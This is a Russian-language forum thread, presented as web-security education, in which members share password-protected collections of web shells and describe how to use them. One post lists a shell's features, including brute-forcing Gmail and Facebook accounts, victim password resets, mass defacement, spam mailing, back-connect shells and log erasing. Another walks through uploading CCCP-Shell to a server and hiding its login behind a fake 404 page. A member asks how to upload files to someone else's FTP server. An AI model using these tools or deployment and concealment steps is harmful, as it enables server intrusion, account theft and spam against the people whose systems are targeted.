Немного про шеллы:Настраиваем, прячем и делаем сами

ВАЖНО Немного про шеллы: Настраиваем, прячем, делаем сами (1 Viewer)

Кто просматривает этот контент: "Тема" (Всего пользователей: 0; Гостей: 1)


X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 823
Репутация
15 073
Jabber
Telegram
Всем привет, был создан новый раздел посвящённый вебу и веб-приложениям "Безопасность веб-приложений и сайтов" !

В этом разделе будут расматриваться различные атаки и методы защиты от них, упор статей и обсуждений будет прежде всего на Администраторов и Пользователей, т.е. что это такое с точки зрения пользователей и администраторов и как защитится...

Каких-то сложных выкладок здесь не будет, ну и постараюсь написать как я это понимаю...

Для начала, размещу выложенную мной статью ещё в хак. разделе про веб-щеллы, далее может ещё какие-нить статьи про XSS и CSRF атаки, многие считают что это одно и тоже, но это нетак !

Также например от XSS и CSRF можно защищаться на стороне пользователя, всё-же это атаки больше даже на конкретного пользователя, но это в других темах...

Можете присоединятся !

Итак тема про шеллы:
Подробнее здесь...
 
Последнее редактирование:

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 999
Репутация
10 016
На одном болгарском форуме попалась на глаза подборка веб-шеллов.В архиве всё свалено в одну кучу,но для ознакомления подойдёт.
Снимок.PNG


Снимок1.PNG
Пароль:111
 

Вложения

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 999
Репутация
10 016
Попался крутой с виду шелл.Кто хочет,посмотреть можно [HIDE=10]здесь[/HIDE].Логин и пароль:AnonGhost
Внимательно смотрим на скрин куда вводит пасс (хитрые испанцы)

*Home
*File Manager

*SYMLINK:
Symlink Info
Cms Scanner
Perl based symlink
Symlink Manual
Manually Retrieve Config
Enable Symlink If Disabled
Python Bypass Forbidden Via TCP Protocol
Symlink Bypass 2014

*BYPASS:
Bypass /etc/passwd
Bypass Users Server
Bypass Perl Security
Bypass Root Path with Zip File
Bypass Root Path with system function
Bypass Root Path with exec function
Bypass Root Path with shell_exec function
Bypass posix_getpwuid
Bypass PHP Suhosin function blacklist
Bypass Functions suPHP_ConfigPath
Bypass suPHP Security
Simple Bypasser
Read Files
Bypass Chmod Directory
Bypass Forbidden 2014
Bypass SafeMode 2014 Priv8

*BRUTEFORCE:
Skype Brute Force
Cpanel Brute Force
Joomla Brute Force
Wordpress Brute Force
Twitter Brute Force
Gmail & Hotmail Brute Force
Ftp Bruteforce

*MASS:
Mass Deface Dirs
Mass Change Admin Joomla
Mass Change Admin vBulletin
Mass Change Admin Mass WordPress
Wordpress & Joomla Mass Deface
Wordpress Hijack Index Priv8
Joomla Index Changer
Wordpress Index Changer
Cpanel & Ftp Auto Defacer

*CGI TELNET

*SERVER SECURITY:
Bypass Server Security Functions
Test Permission
Server Infos

*SPAM:
Mailer Priv8
Everything You Need
Paypal Checker
Email Extractor

*TOOLS:
MySQL & PostgreSql Connect
Command Execution
Base64 Command
Config Grabber
Subdomain Checker
Joomla Reverse Server
Wordpress Reverse Server
Find Directory Writable/Readable
Zone-h Notifier
Shtml Command Shell
Back connect Simple
Ruby BackConnect
Perl BackConnect
Python BackConnect
Exploit
Whcms Killer
Webmail Password Changer
Wordpress Csrf Exploit

*FACEBOOK:
Reset Password Victim
Facebook Multi-Account BruteForce

*IP Reverse Domains

*ALL LOCALROOT KERNEKS EXPLOIT

*SCAN:
Shell Finder
Jce Scanner
JCE Multi-Uploader
Port Scanner
Admin Page Finder
Search Files

*UPLOADER:

From your PC
From Url

*Logs Eraser

*About Shell

*Logout

*Kill Shell
*Ban method after 3 false logins , after the same user can't login even if he changes his Ip Security is 100% and shell suicide automatically

SIN_TTULO-1.PNG

Снимок2.PNG
 

Вложения

  • 114.2 КБ Просмотры: 29

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 823
Репутация
15 073
Jabber
Telegram
Я как понял заливается через уязвимости на какой-нить сервер жертвы и дальше позволяет заливать файлы, рассылать спам и прочее...
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 999
Репутация
10 016
Я как понял заливается через уязвимости на какой-нить сервер жертвы и дальше позволяет заливать файлы, рассылать спам и прочее...
Ага.Ты прав.Кину ка я ссылку на эту хрень под хайд,а то кто-нибудь весь мой фтп разорит)
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 823
Репутация
15 073
Jabber
Telegram
Решил немного "потырить" с хеппи-хак, интересный на мой взгляд софт, там неплохой софт есть...Dmeh-Smeh-Smeh!!!

upload_2016-2-29_15-35-48.png


Не плохой многофункциональный шелл. Для начала меняем пароль шелла на свой.

Для этого кодируем свой пароль в md5 в любом онлайн сервисе и вставляем его в CCCP-Shell.php в начале и в \builder\base\config.php:

upload_2016-2-29_15-36-36.png

Заливаем папку с шеллом на сервер/хостинг и идём по адресу http://site.ru/CCCPShell-master/CCCP-Shell.php (пути можете поменять на свои), видим страницу ошибки, типо не найдено.

Но это ошибка фэйковая, для конспирации, покликав в центре в верхней части страницы мы обнаружим скрытое поле для ввода пароля, вводим туда свой пароль:


upload_2016-2-29_15-37-13.png


и попадаем в панель управления шеллом, где уже можем делать всё что нам вздумается.

Функции:

upload_2016-2-29_15-37-39.png


Back Connect - можно настроить обратное соединение:

upload_2016-2-29_15-38-20.png


Execute - тут можно выполнить произвольный код:

upload_2016-2-29_15-38-49.png


File Manager - менеджер файлов на сервере:

upload_2016-2-29_15-39-11.png


Info - шелл предоставит вам всю информацию по серверу, которую сможет найти:

upload_2016-2-29_15-39-35.png


Process - информация о процессах сервера, можем выбрать любой и "убить":

upload_2016-2-29_15-39-59.png


Self Remove - самовыпил.

SQL - работа с базой данных, где мы может слить дамп или выполнить произвольный SQL запрос:

upload_2016-2-29_15-41-55.png


Шелл исполнен на JS с использованием ajax, пользоваться им одно удовольствие.like itlike itlike it

Пароль:111


Гитхаб:GitHub - xchwarze/CCCPShell: Comunitary PHP Shell. Old repo: https://code.google.com/p/cccp-shell/
 

Вложения

MIXA066

Уважаемый пользователь
Форумчанин
Регистрация
18.05.2014
Сообщения
443
Репутация
183
вопрос как залить файл на чужой фтп сервер)
 
Верх